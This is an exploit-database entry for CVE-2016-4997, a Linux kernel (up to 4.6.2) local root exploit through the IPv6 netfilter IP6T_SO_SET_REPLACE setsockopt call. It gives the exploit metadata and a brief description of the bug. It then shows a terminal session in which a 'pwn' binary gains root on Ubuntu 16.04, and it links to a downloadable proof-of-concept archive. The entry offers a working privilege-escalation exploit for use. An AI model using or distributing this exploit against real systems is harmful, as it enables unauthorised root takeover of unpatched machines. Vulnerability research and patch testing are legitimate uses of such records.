Exploit for linux platform in category local exploits
# Exploit Title: Linux kernel <= 4.6.2 - Local Privileges Escalation via IP6T_SO_SET_REPLACE compat setsockopt call
# Date: 2016.10.8
# Exploit Author: Qian [email protected] Qihoo 360
# Version: Linux kernel <= 4.6.2
# Tested on: Ubuntu 16.04.1 LTS Linux 4.4.0-21-generic
# CVE: CVE-2016-4997
# Reference:http://www.openwall.com/lists/oss-security/2016/09/29/10
# Contact: [email protected]
#DESCRIPTION
#===========
#The IPv6 netfilter subsystem in the Linux kernel through 4.6.2 does not validate certain offset fields,
#which allows local users to escalade privileges via an IP6T_SO_SET_REPLACE compat setsockopt call with ip6_tables module loaded.
[email protected]:~/ipv6_IP6T_SO_SET_REPLACE$ ls
compile.sh enjoy enjoy.c pwn pwn.c version.h
[email protected]:~/ipv6_IP6T_SO_SET_REPLACE$ sudo modprobe ip6_tables
[sudo] password for zhang_q:
[email protected]:~/ipv6_IP6T_SO_SET_REPLACE$ ./pwn
pwn begin, let the bullets fly . . .
and wait for a minute . . .
pwn over, let's enjoy!
preparing payload . . .
trigger modified tty_release . . .
got root, enjoy :)
[email protected]:~/ipv6_IP6T_SO_SET_REPLACE#
[email protected]:~/ipv6_IP6T_SO_SET_REPLACE# id
uid=0(root) gid=0(root) groups=0(root)
[email protected]:~/ipv6_IP6T_SO_SET_REPLACE# hostnamectl
Static hostname: ubuntu
Icon name: computer-vm
Chassis: vm
Machine ID: 355cdf4ce8a048288640c2aa933c018f
Virtualization: vmware
Operating System: Ubuntu 16.04.1 LTS
Kernel: Linux 4.4.0-21-generic
Architecture: x86-64
[email protected]:~/ipv6_IP6T_SO_SET_REPLACE#
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40489.zip
# 0day.today [2018-04-08] #